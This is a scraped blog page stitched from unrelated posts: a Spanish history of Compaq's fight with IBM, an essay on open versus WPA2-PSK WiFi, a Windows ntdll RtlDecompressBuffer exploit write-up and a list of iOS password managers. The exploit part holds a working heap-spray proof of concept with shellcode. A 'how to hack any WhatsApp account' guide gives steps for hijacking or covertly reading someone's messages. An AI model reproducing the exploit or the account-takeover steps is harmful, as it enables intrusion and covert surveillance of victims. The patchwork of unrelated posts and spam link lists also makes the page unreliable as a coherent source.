¡Todos Contra IBM! O Cómo La Empresa Compaq Venció (Con La Ayuda De Amigos) Al Gigante IBM En La Guerra Del PC

En la fantástica y maravillosa serie "Halt Catch and Fire", la cual está basada sutilmente en la historia de Compaq (sobre todo en su primera temporada), se muestra una de las mayores hazañas de ingeniería (y, por cierto, también de marketing) con permiso claro está de Steve Wozniak y su Apple I. En ella aparecen los dos protagonistas, los cuales quieren fabricar un ordenador compatible con IBM, pero claro, para conseguirlo tienen antes que superar un gran obstáculo: crear una BIOS "similar" a la fabricada por el Gigante Azul (o Big Blue, apodo de IBM).

Figura 1: ¡Todos contra IBM! o cómo la empresa Compaq venció
(con la ayuda de amigos) al gigante IBM en la guerra del PC

Pues esto fue con exactitud lo que ocurrió realmente cuando los primeros empleados de la empresa Compaq se propuso crear un ordenador más barato que pudiera ejecutar las aplicaciones creadas para IBM. Y esto provocó quizás la mayor batalla comercial, al menos en el mundo de los ordenadores, de todos los tiempos. Por cierto, esta historia al completo y otras muchas relacionadas con auténticos hackers las podéis encontrar en nuestro libro "Microhistorias: Anécdotas y Curiosidades de la historia de la Informática (y los hackers)" de 0xWord.

Figura 2: Libro de Microhistorias: Anécdotas y curiosidades
de la historia de la informática (y los hackers) en 0xWord

Esta tarea, por supuesto, no fue nada fácil. Los tres fundadores de Compaq, Rod Canion, Jim Harris y Bill Murto, tenían claro que este proceso tenía que ser muy cuidadoso. Para evitar que IBM les acusara de plagio por copiar la BIOS, decidieron crear una ellos mismos. Para ello aplicaron ingeniería inversa a la BIOS de IBM y partiendo de esta información, crear una propia y así evitar alguna demanda (aunque de esto no se librarían como veremos más adelante). Para esta ardua tarea, crearon dos equipos, uno iría realizando la ingeniería inversa a la BIOS original tal y como hemos contado antes, y otro comenzaría desde cero a crear otra partiendo de los datos del primero.

Figura 3: Jim Harris, Bil Murto y Rod Canion, fundadores de Compaq

Resumiendo esta parte de la historia (todo lo que rodea a la fundación de Compaq y la ingeniería inversa daría para otra Microhistoria), finalmente lo consiguieron y así nació el primer clónico IBM que además era portátil, el Compaq Portable (unos 3500$ de la época, con doble disquetera). A pesar de que invirtieron un millón de dólares en la fabricación, fue muy rentable ya que consiguieron más de 111 millones sólo el primer año de su puesta en el mercado. Misión cumplida, pero esto es sólo el comienzo de la historia de David (y algunos amigos) contra Goliat.

Figura 4: El primer ordenador compatible IBM, el Compaq Portable

IBM como podéis imaginar, no se quedó de brazos cruzados. Intentó por todos lo medios evitar que Compaq pudiera sacar al mercado sus ordenadores clónicos, utilizando todos sus recursos legales (que eran auténticos ejércitos de abogados). Al final consiguieron que Compaq pagara varios millones de multas por infringir sus patentes, las cuales curiosamente no tenían nada que ver con la BIOS, sino con otros componentes del ordenador como, por ejemplo, la fuente de alimentación.

Pero Compaq había abierto la Caja de Pandora. Otros fabricantes de la época vieron el filón de la creación de ordenadores personales compatibles con IBM, ya que estos acaparaban el negocio del software, sobre todo de gestión empresarial. Así que IBM tenía que hacer algo radical si no quería perder el mercado que había sido exclusivamente suyo durante años.

Figura 5: Logotipo original de Compaq

A finales de los ochenta, Compaq ya vendía más ordenadores que IBM, algo realmente impensable unos años antes. En 1987, IBM, en un movimiento desesperado de reacción contra Compaq, sorprendió a la industria con una nueva tecnología llamada Micro Channel Architecture o el bus Micro Channel (MCA) de 16/32 bits, muy superior en funcionalidad comparada con la actual tecnología bus ISA. Además, sacaron simultáneamente un flamante nuevo ordenador el cual llevaba implementada esta nueva arquitectura: el IBM PS/2. La idea era ofrecer algo nuevo, innovador que mantuviera a los fabricantes de clónicos ocupados durante unos años y de esta forma volver a tomar la delantera en el mercado de los PCs.

El nuevo hardware era un cambio radical. Además de incluir los nuevos MCA se incluyeron otras nuevas características como el ya famoso puerto PS/2 para teclado y ratón, doble BIOS (una para la compatibilidad con los viejos PCs (Compatible BIOS, CBIOS) y otra totalmente nueva (Advanced BIOS, ABIOS). Esta nueva ABIOS incluía un modo protegido utilizado por el sistema operativo OS/2, la otra sorpresa presentada por IBM.

Figura 6: Modelos de la familia PS/2 de IBM

OS/2 era un sistema operativo (desarrollado junto a Microsoft) que fue anunciado a la vez que el IBM PS/2, el problema es que este se puso en el mercado un poco tarde, y por lo tanto los primeros modelos venían con el clásico IBM PC DOS 3.3. A pesar de todo, la jugada parecía que iba a funcionar. La nueva arquitectura era mucho mejor que la anterior y, además, prácticamente todo el software (la gran baza que todos los fabricantes querían mantener) era compatible. 

Y con este nuevo hardware y el OS/2, el cual ofrecía características innovadoras para la época como un modo protegido, una API gráfica o un nuevo sistema de ficheros llamado HPFS. Este nuevo asalto de IBM no podía fallar, lo tenía todo, hardware más rápido y eficiente (aunque todo el hardware desarrollado hasta ahora no se podía instalar en este nuevo ordenador) pero además ofrecía una nueva base para el desarrollo de software más avanzado.

Figura 7: Aspecto del OS/2 Warp, el cual tiene un razonable parecido a Windows

IBM protegió toda la tecnología del IBM PS/2 rozando casi lo absurdo. El número de patentes asociados a todos los componentes ya sea software o hardware era realmente inmenso. No podían dejar que volviera a pasar lo mismo que ocurrió con Compaq. Esta vez iban a crear de nuevo un imperio, pero con sus normas desde la base. De hecho, las tasas que cobraban (hasta un 5%) para que una tercera empresa pudiera utilizar su nueva tecnología eran realmente exageradas, lo que provocó que sólo un pequeño número de compañías se atrevieran a fabricar tanto hardware como software compatible con el PS/2. 

Así que IBM se sentó a esperar la reacción de sus competidores, no sin cierta satisfacción, ya que si querían seguir con su estrategia de "imitación" de sus productos, esta vez lo tenían todo atado para que estos pasaran por caja. Pero la respuesta de sus competidores, contra todo pronóstico, sorprendió totalmente a IBM y a la industria en general.

Figura 8: Aspecto de una tarjeta gráfica IBM XGA-2 de 32 bis con tecnología MCA

En 1988, sólo un año después del movimiento de IBM, las nueve principales empresas que fabricaban ordenadores clónicos IBM de la época: AST Research, Compaq Computer (liderando este consorcio), Epson, HP, NEC, Olivetti, Tandy, WYSE y Zenith Data Systems reaccionaron ante este desafío haciendo algo realmente innovador y que IBM no esperaba en absoluto: crearon un estándar nuevo "abierto" llamado EISA el cual era compatible con todo el hardware actual del IBM PC XT-Bus. Pero además ofrecía nuevas características (como el bus mastering, que permitía el acceso a 4GB de memoria) para hacerlo más rápido y eficiente, casi al nivel del MCA. Esto no lo esperaba IBM.

Figura 9: Aspecto del bus EISA

Este cambio total de estrategia descolocó totalmente al Gigante Azul, el cual intentó por todos los medios impulsar sus IBM PS/2 así como OS/2 pero poco a poco, EISA fue ganando la batalla. EISA era más barato de implementar y además al ser abierto, cualquiera podría fabricarlo. Había comenzado la batalla final por la supremacía de la industria del PC. Pero EISA había nacido para ganar desde el primer momento. 

Posiblemente, IBM hubiera vencido esta batalla si en vez de crear algo totalmente incompatible y nuevo, se hubiera centrado algo más en la compatibilidad de los viejos sistemas y sacar algo parecido al EISA, pero con tasas y royalties más asequibles por su utilización. De esta forma, el resto de las empresas no hubiera tenido más remedio que seguir su estela, pero ellos estarían a la cabeza. Pero lamentablemente, su estrategia radical hizo que sus competidores sacaran un sistema abierto provocando una divergencia en el mercado que IBM acabó perdiendo.

Figura 10: Tarjeta de vídeo EISA e ISA, ELSA Winner 1000

Después del fracaso del MCA y los PS/2, a pesar de ser un gran ordenador y sistema operativo, IBM comenzó su declive como fabricante de ordenadores PC. Pero aún así, IBM se mantuvo a flote con las ventas del PS/2 (vendió 1.5 millones de unidades) e incluso llegó a fabricar, en 1996, ordenadores con el bus EISA integrado hasta la llegada del PCI. Pero IBM se atascó en el mercado del PC y finalmente en 2004, vendió su división de ordenadores a la empresa china Lenovo. IBM no soportó el tremendo fracaso del PS/2 y la inesperada estrategia del clan de los nueve. Compaq había ganado la batalla del PC. 

Pero lo más curioso de todo esto, es que realmente la ganadora al final de todas estas batallas sin piedad ha sido IBM. Después de encarnizada lucha con Compaq, IBM se centró más en software (empresarial), servidores e incluso superordenadores, es decir, más investigación y supercomputación. Hoy día IBM es uno de los líderes en investigación relacionada con la Inteligencia Artificial (IA) y su flamante Watson, hardware y software de IA orientado a los negocios, lanzando Power9 - por ejemplo -, y está apostando fuerte por el ordenador cuántico. También es propietaria de una de las distribuciones Linux más extendidas a nivel comercial, Red Hat. IBM es posiblemente la mejor demostración implícita de cómo reinventarse cuando algo o alguien nos quita nuestro "queso", algo que ahora, lamentablemente, tenemos más que nunca tener en cuenta ante la nueva situación mundial, tal y como Chema Alonso explicó en este post.

Figura 10: El superordenador IBM Watson

Pero IBM ha sobrevivido y sigue a la cabeza de la innovación tecnológica. De hecho, el primer ordenador cuántico comercial también ha sido fabricado por IBM. ¿Estamos ante las puertas de una nueva guerra, esta vez por el mercado del ordenador cuántico? En cierta manera, IBM ha vuelto a la delantera del "PC" (cuántico esta vez). De todas formas, a ver quién es el/la valiente que le hace ingeniería inversa a la BIOS de un ordenador cuántico, si es que tiene alguna ;). Por cierto, el documental "Silicon Cowboys" explica en detalle la historia de Compaq y su guerra con IBM. No está mal para tres emprendedores que, en principio, querían montar un restaurante de comida mejicana … menos mal que cambiaron de opinión.

Happy Hacking Hackers!!!

Autores:

Fran Ramírez, (@cyberhadesblog) es investigador de seguridad y miembro del equipo de Ideas Locas en CDO en Telefónica, co-autor del libro "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)", del libro "Docker: SecDevOps", también de "Machine Learning aplicado a la Ciberseguridad" además del blog CyberHades. Puedes contactar con Fran Ramirez en MyPublicInbox.

 Contactar con Fran Ramírez en MyPublicInbox

Rafael Troncoso (@tuxotron) es Senior Software Engineer en SAP Concur, co-autor del libro "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)", del libro "Docker: SecDevOps" además del blog CyberHades. Puedes contactar con Rafael Troncoso en MyPublicInbox.

Contactar con Rafael Troncoso en MyPublicInbox

Sigue Un informático en el lado del mal RSS 0xWord

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Read more

1. Hacker Software
2. Pentest With Kali
3. Pentest Active Directory
4. Pentest Iso
5. Pentest Cyber Security
6. Pentest Smtp
7. What Hacking Is
8. Pentest Companies
9. Pentest Reporting Tool
10. Pentest+ Vs Ceh
11. Pentesterlab
12. Hacker
13. Pentest Wordpress
14. Pentest Ubuntu
15. Hacking Vpn

Mythbusters: Is An Open (Unencrypted) WiFi More Dangerous Than A WPA2-PSK? Actually, It Is Not.

Introduction

Whenever security professionals recommend the 5 most important IT security practices to average users, one of the items is usually something like: "Avoid using open Wifi" or "Always use VPN while using open WiFi" or "Avoid sensitive websites (e.g. online banking) while using open WiFI", etc.

What I think about this? It is bullshit. But let's not jump to the conclusions. Let's analyze all risks and factors here.

During the following analysis, I made two assumptions. The first one is that we are comparing public WiFi hotspots with no encryption at all (referred to as Open), and we compare this to public WiFi hotspots with WPA2-PSK (and just hope WEP died years before). The other assumption is there are people who are security-aware, and those who just don't care. They just want to browse the web, access Facebook, write e-mails, etc.

The risks

Let's discuss the different threats people face using public hotspots, compared to home/work internet usage:

1. Where the website session data is not protected with SSL/TLS (and the cookie is not protected with secure flag), attackers on the same hotspot can obtain the session data and use it in session/login credentials stealing. Typical protocols affected:

• HTTP sites
• HTTPS sites but unsecured cookie
• FTP without encryption
• IMAP/SMTP/POP3 without SSL/TLS or STARTTLS

2. Attackers can inject extra data into the HTTP traffic, which can be used for exploits, or social engineer attacks (e.g. update Flash player with our malware) – see the Dark Hotel campaign

3. Attackers can use tools like SSLStrip to keep the user's traffic on clear text HTTP and steal password/session data/personal information

4. Attackers can monitor and track user activity

5. Attackers can directly attack the user's machine (e.g. SMB service)

WPA2-PSK security

So, why is a public WPA2-PSK WiFi safer than an open WiFi? Spoiler alert: it is not!

In a generic public WPA2-PSK scenario, all users share the same password. And guess what, the whole traffic can be decrypted with the following information: SSID + shared password + information from the 4-way handshake. https://wiki.wireshark.org/HowToDecrypt802.11

If you want to see it in action, here is a nice tutorial for you

http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html

Decrypted WPA2-PSK traffic

Any user having access to the same WPA2-PSK network knows this information. So they can instantly decrypt your traffic. Or the attackers can just set up an access point with the same SSID, same password, and stronger signal. And now, the attacker can instantly launch active man-in-the-middle attacks. It is a common belief (even among ITSEC experts) that WPA2-PSK is not vulnerable to this attack. I am not sure why this vulnerability was left in the protocol, if you have the answer, let me know. Edit (2015-08-03): I think the key message here is that without server authentication (e.g. via PKI), it is not possible to solve this.

Let me link here one of my previous posts here with a great skiddie tool:

http://jumpespjump.blogspot.nl/2014/04/dsploit.html

To sum up, attackers on a WPA2-PSK network can:

• Decrypt all HTTP/FTP/IMAP/SMTP/POP3 passwords or other sensitive information
• Can launch active attacks like SSLStrip, or modify HTTP traffic to include exploit/social engineer attacks
• Can monitor/track user activity

The only difference between open and WPA2-PSK networks is that an open network can be hacked with an attacker of the skill level of 1 from 10, while the WPA2-PSK network needs and an attacker with a skill level of 1.5. That is the difference.

The real solutions

1. Website owners, service providers should deploy proper (trusted) SSL/TLS infrastructure, protect session cookies, etc. Whenever a user (or security professional) notices a problem with the quality of the service (e.g. missing SSL/TLS), the service provider has to be notified. If no change is made, it is recommended to drop the service provider and choose a more secure one. Users have to use HTTPS Everywhere plugin.

2. Protect the device against exploits by patching the software on it, use a secure browser (Chrome, IE11 + enhanced protection), disable unnecessary plugins (Java, Flash, Silverlight), or at least use it via click-to-play. Also, the use of exploit mitigations tools (EMET, HitmanPro Alert, Malwarebytes AntiExploit) and a good internet security suite is a good idea.

3. Website owners have to deploy HSTS, and optionally include their site in an HSTS preload list

4. Don't click blindly on fake downloads (like fake Flash Player updates)

5. The benefits of a VPN is usually overestimated. A VPN provider is just another provider, like the hotspot provider, or the ISP. They can do the same malicious stuff (traffic injecting, traffic monitoring, user tracking). Especially when people use free VPNs. And "Average Joe" will choose a free VPN. Also, VPN connections tend to be disconnected, and almost none of the VPN providers provide fail secure VPNs. Also, for the price of a good VPN service you can buy a good data plan and use 4G/3G instead of low-quality public hotspots. But besides this, on mobile OSes (Android, iOS, etc.) I strongly recommend the use of VPN, because it is not practically feasible to know for users which app is using SSL/TLS and which is not.

6. Use a location-aware firewall, and whenever the network is not trusted, set it to a Public.

7. In a small-business/home environment, buy a WiFi router with guest WiFi access possibility, where the different passwords can be set to guest networks than used for the other.

Asking the question "Are you using open WiFi?", or "Do you do online banking on open WiFi?" are the wrong questions. The good questions are:

• Do you trust the operator(s) of the network you are using?
• Are the clients separated?
• If clients are not separated, is it possible that there are people with malicious intent on the network?
• Are you security-aware, and are you following the rules previously mentioned? If you do follow these rules, those will protect you on whatever network you are.

And call me an idiot, but I do online banking, e-shopping, and all the other sensitive stuff while I'm using open WiFi. And whenever I order pizza from an HTTP website, attackers can learn my address. Which is already in the phone book, on Facebook, and in every photo metadata I took with my smartphone about my cat and uploaded to the Internet (http://iknowwhereyourcatlives.com/).

Most articles and research publications are full of FUD about what people can learn from others. Maybe they are just outdated, maybe they are not. But it is totally safe to use Gmail on an open WiFi, no one will be able to read my e-mails.

PS: I know "Average Joe" won't find my blog post, won't start to read it, won't understand half I wrote. But even if they do, they won't patch their browser plugins, pay for a VPN, or check the session cookie. So they are doomed to fail. That's life. Deal with it.

Continue reading

1. Pentest App
2. Hacker Wifi Password
3. Pentest Windows 7
4. Hacking Programs
5. Pentest App
6. Pentest Nmap
7. Pentest As A Service
8. Hacking For Dummies
9. Hacker Typer
10. Pentest Bootcamp
11. Pentest Wordpress
12. Hacking Google
13. Pentest Practice

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
  int result; // eax@4

  if ( algorithm & algorithm != 1 )
  {
    if ( algorithm & 0xF0 )
      result = -1073741217;
    else
      result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
  }
  else
  {
    result = -1073741811;
  }
  return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

• the movzx limits the boundaries to 16bits
• the test ax, ax avoids the algorithm 0
• the cmp ax, 1 avoids the algorithm 1
• the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*
    ntdll!RtlDecompressBuffer() vtable exploit + heap spray
    by @sha0coder

*/

#include 
#include 
#include 

#define KB  1024
#define MB  1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
       "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
       "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
       "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
       "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
       "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
       "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
       "\x45\x81\x3e\x43\x72\x65\x61\x75"
       "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
       "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
       "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
       "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
       "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
       "\x6c\x63\x89\xe2\x52\x52\x53\x53"
       "\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
  printf("%s\n\n", msg);
  exit(1);
}

PUCHAR spray(HANDLE heap) {
  PUCHAR map = 0;

  printf("Spraying ...\n");
  printf("Aproximating to %p\n", landing_ptr);

  while (map < landing_ptr-1*MB) {
    map = HeapAlloc(heap, 0, 1*MB);
  }

  //map = HeapAlloc(heap, 0, 1*MB);

  printf("Aproximated to [%x - %x]\n", map, map+1*MB);


  printf("Landing adddr: %x\n", landing_ptr);
  printf("Offset of landing adddr: %d\n", landing_ptr-map);

  return map;
}

void landing_sigtrap(int num_of_traps) {
  memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
  memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
  FARPROC RtlDecompressBuffer;
  NTSTATUS ntStat;
  HANDLE heap;
  PUCHAR compressed, uncompressed;
  ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

  RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

  heap = GetProcessHeap();

  compressed_sz = estimated_uncompressed_sz = 1*KB;

  compressed = HeapAlloc(heap, 0, compressed_sz);

  uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


  spray(heap);
  copy_shellcode();
  //landing_sigtrap(1*KB);
  printf("Landing ...\n");

  ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

  switch(ntStat) {
    case STATUS_SUCCESS:
      printf("decompression Ok!\n");
      break;

    case STATUS_INVALID_PARAMETER:
      printf("bad compression parameter\n");
      break;


    case STATUS_UNSUPPORTED_COMPRESSION:
      printf("unsuported compression\n");
      break;

    case STATUS_BAD_COMPRESSION_BUFFER:
      printf("Need more uncompressed buffer\n");
      break;

    default:
      printf("weird decompression state\n");
      break;
  }

  printf("end.\n");
}

The attack vector

This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

More articles

1. Pentest Owasp Top 10
2. Pentest Process
3. Hacker0Ne
4. Pentest Vpn
5. Hacking With Python
6. Pentestgeek
7. Pentest Network
8. Hacker Forum
9. Pentest Vpn
10. Hacking Images
11. What Hacking Is
12. Rapid7 Pentest
13. Hackerone
14. Pentest Box

How To Hack Any Whatsapp Account In 2020

The article will also be broken down into different subtopics and subcategories. This to make it easy for those who are just interested in skimming through the article to pick the part of WhatsApp hack they are most interested in. Just incase you don't have enough time to go through the entire article.

Search queries like these are a common place; Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular trade fair in the world? This article gives you all the solution you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger is now on an end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old &deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use a software that can hack WhatsApp remotely. All manufacturers offer to read the WhatsApp messages an extra web portal. In addition to the Whatsapp messages but can also spy on other messengers. So you can also have access to social media accounts.

The software may only be installed on a smartphone. If the user of the smartphone has been informed about the installation and effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack Whatsapp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, the other phone only needs to clone WhatsApp messages is internet connection.

The trick to hack Whatsapp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, here lies the vulnerability. But you can also protect yourself from the Whatsapp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read Whatsapp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read Whatsapp messages. Even with the PIN or fingerprint, the Whatsapp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack an account from Whatsapp, the app from the App Store must be installed on the second cell phone. After the installation of Whatsapp, target's phone number is entered. A confirmation request must be waited until access to the smartphone of the victim exists.

STEP 2: WhatsApp Account Confirmation

The confirmation of the Whatsapp account is the actual security risk of the messenger. Whatsapp usually confirms the registration via SMS. Occasionally the confirmation will also be sent by automated phone call via a phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim immediately notices the Whatsapp hack as soon as Whatsapp is opened. If the victim goes through the sign-in process again. The attacker loses access to the messages and no Whatsapp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack whatsapp online. Here you can read WhatsApp messages via a browser and also write. The target user can continue to use his cell phone (works for iOS, Android phone etc) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to be able to read WhatsApp messages by installing software. Access to the unlocked smartphone is required for a short time. In addition, cell phone, a computer or laptop is necessary. On this the Whatsapp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, Whatsapp must be started there. The Whatsapp settings include Whatsapp Web . If this is selected, Whatsapp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

If the QR code is scanned in the browser with the smartphone. There is a permanent connection and Whatsapp messages can be read. If you want to hack Whatsapp in this way. You have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this Whatsapp hack only when the settings are invoked to Whatsapp Web in the app. Whatsapp messages can be read via the browser. Regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps from Android or iOS to send and receive messages. But Whatsapp remains everyone's favorite globally!

Whatsapp is one of the popular apps in the world. There are more than 2 billion active users on Whatsapp, messaging daily with the app. Why do people love WhatsApp? Whatsapp is very convenient and easy to use.

Other messaging apps like Facebook Messenger, still needs a special account to sign up for this app. If you change a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.

HACKER NT

Continue reading

• Pentest Smtp
• Pentest Enumeration
• Pentest Website
• Hacking Growth
• Pentest Firewall
• Basic Pentest 1 Walkthrough
• Pentestmonkey Sql Injection
• What Hacking Is
• Pentest Questions
• Hacker Prank
• Pentest Linux
• Pentest Framework
• Hacking Script
• Pentest Report Generator
• Pentest Vs Red Team
• Pentest Windows

BEST PASSWORD MANAGERS FOR IOS

As I said, Apple's iOS is also prone to cyber attacks, so you can use some of the best password managers for iOS to secure your online accounts.

BEST PASSWORD MANAGERS FOR IOS

Here I have streamlined few of the best password managers for iOS including Keeper, OneSafe, Enpass, mSecure, LastPass, RoboForm, SplashID Safe and LoginBox Pro.

1. ONESAFE PASSWORD MANAGER (CROSS-PLATFORM)

OneSafe is one of the best Password Manager apps for iOS devices that lets you store not only your accounts' passwords but also sensitive documents, credit card details, photos, and more.

OneSafe password manager app for iOS encrypts your data behind a master password, with AES-256 encryption — the highest level available on mobile — and Touch ID. There is also an option for additional passwords for given folders.

OneSafe password manager for iOS also offers an in-app browser that supports autofill of logins, so that you don't need to enter your login details every time.

Besides this, OneSafe also provides advanced security for your accounts' passwords with features like auto-lock, intrusion detection, self-destruct mode, decoy safe and double protection.

Download OneSafe Password Manager: iOS | Mac | Android | Windows

2. SPLASHID SAFE PASSWORD MANAGER (CROSS-PLATFORM)

SplashID Safe is one of the oldest and best password management tools for iOS that allows users to securely store their login data and other sensitive information in an encrypted record.

All your information, including website logins, credit card and social security data, photos and file attachments, are protected with 256-bit encryption.

SplashID Safe Password Manager app for iOS also provides web autofill option, meaning you will not have to bother copy-pasting your passwords in login.

The free version of SplashID Safe app comes with basic record storage functionality, though you can opt for premium subscriptions that provide cross-device syncing among other premium features.

Download SplashID Safe Password Manager: Windows and Mac | iOS | Android

3. LOGIN BOX PRO PASSWORD MANAGER

LoginBox Pro is another great password manager app for iOS devices. The app provides a single tap login to any website you visit, making the password manager app as the safest and fastest way to sign in to password-protected internet sites.

LoginBox Password Manager app for iOS combines a password manager as well as a browser.

From the moment you download it, all your login actions, including entering information, tapping buttons, checking boxes, or answering security questions, automatically completes by the login box Password Manager app.

For security, the login box Password Manager app uses hardware-accelerated AES encryption and passcode to encrypt your data and save it on your device itself.

Download LoginBox Password Manager: iOS | Android

Related news

1. Pentest Guide
2. Hacker Code
3. Pentest Nmap
4. Pentest Practice Sites
5. Hacker Typer
6. Pentest Certification
7. Hacking Wifi
8. Pentest Open Source
9. Hacker Ethic
10. Hacking Tools